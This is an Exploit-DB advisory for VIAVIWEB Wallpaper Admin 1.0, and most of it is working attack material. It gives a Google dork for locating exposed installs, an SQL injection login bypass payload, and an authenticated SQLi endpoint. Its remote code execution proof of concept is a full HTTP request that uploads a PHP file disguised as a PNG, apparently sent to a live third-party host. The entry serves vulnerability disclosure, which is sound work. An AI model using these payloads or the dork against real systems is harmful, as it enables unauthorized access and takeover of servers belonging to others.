VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities

EDB-ID:

51033

CVE:

N/A




Platform:

PHP

Date:

2023-03-22


# Exploit Title: VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities
# Google Dork: intext:"Wallpaper Admin"   "LOGIN" "password" "Username"
# Date: [18/09/2022]
# Exploit Author: [Edd13Mora]
# Vendor Homepage: [www.viaviweb.com]
# Version: [N/A]
# Tested on: [Windows 11 - Kali Linux]

------------------
SQLI on the Login page
------------------
payload --> admin' or 1=1-- -
---
POC:
---
[1] Disable JavaScript on ur browser put the payload and submit
[2] Reactive JavaScript and resend the request
---------------------------
Authenticated SQL Injection:
---------------------------
Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/edit_gallery_image.php?img_id=[number]
-----------------------------------------------
Remote Code Execution (RCE none authenticated):
-----------------------------------------------
Poc:
----
Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/add_gallery_image.php?add=yes
--------------------
Burp Request :
--------------------

POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2
Host: http://googlezik.freehostia.com
Cookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jdg8oraed4o52
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------33893919268150571572221367848
Content-Length: 467
Origin: http://googlezik.freehostia.com
Referer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yes
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------33893919268150571572221367848
Content-Disposition: form-data; name="category_id"

1
-----------------------------33893919268150571572221367848
Content-Disposition: form-data; name="image[]"; filename="poc.php"
Content-Type: image/png

<?php phpinfo(); ?>
-----------------------------33893919268150571572221367848
Content-Disposition: form-data; name="submit"


-----------------------------33893919268150571572221367848--


Uploaded File can be found here :
--------------------------------
http://localhost/PAth-Where-Script-Installed/categories/
```